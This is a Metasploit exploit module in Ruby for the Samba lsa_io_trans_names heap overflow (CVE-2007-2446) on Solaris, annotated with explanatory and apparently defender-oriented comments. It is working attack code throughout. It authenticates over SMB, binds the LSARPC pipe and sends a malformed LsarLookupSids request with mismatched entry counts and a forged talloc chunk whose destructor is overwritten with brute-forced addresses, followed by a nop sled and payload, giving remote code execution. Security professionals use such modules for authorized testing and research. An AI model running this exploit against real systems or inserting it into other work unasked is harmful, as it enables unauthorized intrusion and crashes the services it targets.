##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
# Samba lsa_io_trans_names heap overflow (CVE-2007-2446), Solaris targets.
#
# Defender-side summary of what the metadata and code below state: every
# attempt is expected to crash the service ('Stability' => CRASH_SERVICE_RESTARTS)
# and leaves traces in the Samba logs ('SideEffects' => IOC_IN_LOGS); the
# description also says the technique fails once the Samba "log level" is above
# 2. On the wire the module logs in over SMB, binds the LSARPC interface on the
# SMBPIPE pipe, sends one open-policy request and then one LsarLookupSids
# request whose two entry counts do not agree (see #brute_exploit), followed by
# a nop sled and the payload.
class MetasploitModule < Msf::Exploit::Remote
  Rank = AverageRanking

  include Msf::Exploit::Remote::DCERPC
  include Msf::Exploit::Remote::SMB::Client
  include Msf::Exploit::Brute

  # Registers module metadata, targets and options.
  #
  # Each target carries a 'Bruteforce' range ('Start'/'Stop'/'Step' on 'Ret');
  # Msf::Exploit::Brute is presumably what walks that range and calls
  # #brute_exploit once per candidate address. The DEBUG target pins both ends
  # of the range to the same placeholder value 0xaabbccdd. Payload space is
  # capped at 1024 bytes.
  #
  # @param info [Hash] module info merged by update_info
  def initialize(info = {})
    super(
      update_info(
        info,
        'Name' => 'Samba lsa_io_trans_names Heap Overflow',
        'Description' => %q{
          This module triggers a heap overflow in the LSA RPC service
          of the Samba daemon. This module uses the TALLOC chunk overwrite
          method (credit Ramon and Adriano), which only works with Samba
          versions 3.0.21-3.0.24. Additionally, this module will not work
          when the Samba "log level" parameter is higher than "2".
        },
        'Author' => [
          'Ramon de C Valle',
          'Adriano Lima <adriano[at]risesecurity.org>',
          'hdm'
        ],
        'License' => MSF_LICENSE,
        'References' => [
          ['CVE', '2007-2446'],
          ['OSVDB', '34699'],
        ],
        'Privileged' => true,
        'Payload' => {
          'Space' => 1024
        },
        'Platform' => 'solaris',
        'Targets' => [
          [
            'Solaris 8/9/10 x86 Samba 3.0.21-3.0.24',
            {
              'Platform' => 'solaris',
              'Arch' => [ ARCH_X86 ],
              'Nops' => 64 * 1024,
              # Candidate 'Ret' values are tried from 'Start' to 'Stop' in
              # 'Step' increments; the sled size above is what makes a 60 KiB
              # step tolerable.
              'Bruteforce' =>
              {
                'Start' => { 'Ret' => 0x082f2000 },
                'Stop' => { 'Ret' => 0x084f2000 },
                'Step' => 60 * 1024
              }
            }
          ],
          [
            'Solaris 8/9/10 SPARC Samba 3.0.21-3.0.24',
            {
              'Platform' => 'solaris',
              'Arch' => [ ARCH_SPARC ],
              'Nops' => 64 * 1024,
              'Bruteforce' =>
              {
                'Start' => { 'Ret' => 0x00322000 },
                'Stop' => { 'Ret' => 0x00722000 },
                'Step' => 60 * 1024
              }
            }
          ],
          [
            # Single-shot target with a recognisable placeholder address,
            # useful for watching the crash in a debugger.
            'DEBUG',
            {
              'Platform' => 'solaris',
              'Arch' => [ ARCH_X86 ],
              'Nops' => 64 * 1024,
              'Bruteforce' =>
              {
                'Start' => { 'Ret' => 0xaabbccdd },
                'Stop' => { 'Ret' => 0xaabbccdd },
                'Step' => 60 * 1024
              }
            }
          ],
        ],
        'DisclosureDate' => '2007-05-14',
        'DefaultTarget' => 0,
        # Operator-facing impact notes: the service crashes on each attempt
        # and the attempt is visible in the Samba logs.
        'Notes' => {
          'Stability' => [CRASH_SERVICE_RESTARTS],
          'Reliability' => [REPEATABLE_SESSION],
          'SideEffects' => [IOC_IN_LOGS]
        }
      )
    )

    register_options([
      OptString.new('SMBPIPE', [true, 'The pipe name to use', 'LSARPC']),
    ])

    # Hidden from the option list because #brute_exploit forces this setting
    # to false before binding.
    deregister_options('DCERPC::fake_bind_multi')
  end

  # Need to perform target detection
  #
  # @return [false] presumably keeps the module out of automatic target
  #   selection, since the bruteforce ranges only make sense for an explicitly
  #   chosen target - confirm against Msf::Exploit::Remote
  def autofilter
    false
  end

  # Sends one exploit attempt using the candidate return address supplied by
  # the brute-force driver.
  #
  # Flow as written below: connect and smb_login, bind the LSARPC interface on
  # the SMBPIPE pipe, take the 20-byte prefix returned by #lsa_open_policy as
  # the start of the request, then append the LookupSids stub: two entry
  # counts that disagree (num_entries vs num_entries2), num_entries 16-byte
  # records, a fake talloc chunk header whose destructor field is
  # target_addrs['Ret'], the nop sled and the encoded payload. Opnum 0x0f is
  # then called once. A missing reply or EOF is reported as expected, a DCERPC
  # fault as a likely patched server, and the payload handler runs before the
  # SMB session is torn down.
  #
  # @param target_addrs [Hash] brute-force candidate; only 'Ret' is read here
  # @return [void]
  def brute_exploit(target_addrs)
    # Build the nop sled once and reuse it across brute-force iterations; an
    # empty string when the target declares no nops.
    if !@nops
      if (target['Nops'] > 0)
        print_status('Creating nop sled....')
        @nops = make_nops(target['Nops'])
      else
        @nops = ''
      end
    end

    print_status('Trying to exploit Samba with address 0x%.8x...' % target_addrs['Ret'])

    nops = @nops
    pipe = datastore['SMBPIPE'].downcase

    print_status('Connecting to the SMB service...')
    connect
    smb_login

    # Force a plain single-interface bind; the option is deregistered in
    # #initialize so it cannot be changed by the operator.
    datastore['DCERPC::fake_bind_multi'] = false

    # LSARPC interface UUID, version 0.0, reached over the named pipe from SMBPIPE.
    handle = dcerpc_handle('12345778-1234-abcd-ef00-0123456789ab', '0.0', 'ncacn_np', ["\\#{pipe}"])
    print_status("Binding to #{handle} ...")
    dcerpc_bind(handle)
    print_status("Bound to #{handle} ...")

    # The request advertises num_entries trans-name records but a larger
    # num_entries2; the 16-byte records built below are sized to num_entries.
    num_entries = 272
    num_entries2 = 288

    #
    # First talloc_chunk
    # 16 bits align
    # 16 bits sid_name_use
    # 16 bits uni_str_len
    # 16 bits uni_max_len
    # 32 bits buffer
    # 32 bits domain_idx
    #
    buf = (('A' * 16) * num_entries)

    # Padding
    buf << 'A' * 8

    # TALLOC_MAGIC
    talloc_magic = "\x70\xec\x14\xe8"

    # Second talloc_chunk header
    buf << 'A' * 8 # next, prev
    buf << NDR.long(0) + NDR.long(0) # parent, child
    buf << NDR.long(0) # refs
    buf << [target_addrs['Ret']].pack('V') # destructor - the candidate address under test, little-endian
    buf << 'A' * 4 # name
    buf << 'A' * 4 # size
    buf << talloc_magic # flags

    # First 20 bytes of the open-policy response; the LookupSids request
    # starts with them.
    stub = lsa_open_policy(dcerpc)

    stub << NDR.long(0) # num_entries
    stub << NDR.long(0) # ptr_sid_enum
    stub << NDR.long(num_entries) # num_entries
    stub << NDR.long(0x20004) # ptr_trans_names
    stub << NDR.long(num_entries2) # num_entries2
    stub << buf
    stub << nops
    stub << payload.encoded

    print_status('Calling the vulnerable function...')

    begin
      # LsarLookupSids
      dcerpc.call(0x0f, stub)
    rescue Rex::Proto::DCERPC::Exceptions::NoResponse, Rex::Proto::SMB::Exceptions::NoReply, ::EOFError
      # No answer or a closed socket: the server side stopped responding,
      # which the module treats as the normal outcome of the call.
      print_status('Server did not respond, this is expected')
    rescue Rex::Proto::DCERPC::Exceptions::Fault
      # The request was parsed and rejected with a DCERPC fault; the module
      # reads that as a server without the bug.
      print_error('Server is most likely patched...')
    rescue StandardError => e
      # Other errors are classified by message; a pipe disconnect is reported
      # the same way as no response.
      if e.to_s =~ /STATUS_PIPE_DISCONNECTED/
        print_status('Server disconnected, this is expected')
      else
        print_error("Error: #{e.class}: #{e}")
      end
    end

    # NOTE(review): disconnect is only reached on this path; an exception
    # raised by connect, smb_login or dcerpc_bind above propagates before it -
    # presumably the framework cleans the socket up, confirm.
    handler
    disconnect
  end

  # Issues an LSA open-policy request (opnum 6 on the bound LSARPC interface)
  # and returns the leading 20 bytes of the response stub, which
  # #brute_exploit uses as the opening of its LookupSids request.
  #
  # @param dcerpc [Object] the bound DCERPC client from the DCERPC mixin
  # @param server [String] server name, marshalled as a Unicode string
  # @return [String] first 20 bytes of the response stub (presumably the
  #   policy handle - verify against the LSA IDL)
  def lsa_open_policy(dcerpc, server = '\\')
    stubdata =
      # Server
      NDR.uwstring(server) +
      # Object Attributes
      NDR.long(24) + # SIZE
      NDR.long(0) + # LSPTR
      NDR.long(0) + # NAME
      NDR.long(0) + # ATTRS
      NDR.long(0) + # SEC DES
      # LSA QOS PTR
      NDR.long(1) + # Referent
      NDR.long(12) + # Length
      NDR.long(2) + # Impersonation
      NDR.long(1) + # Context Tracking
      NDR.long(0) + # Effective Only
      # Access Mask
      NDR.long(0x02000000)

    dcerpc.call(6, stubdata)

    # Only the first 20 bytes of the reply are kept.
    dcerpc.last_response.stub_data[0, 20]
  end
end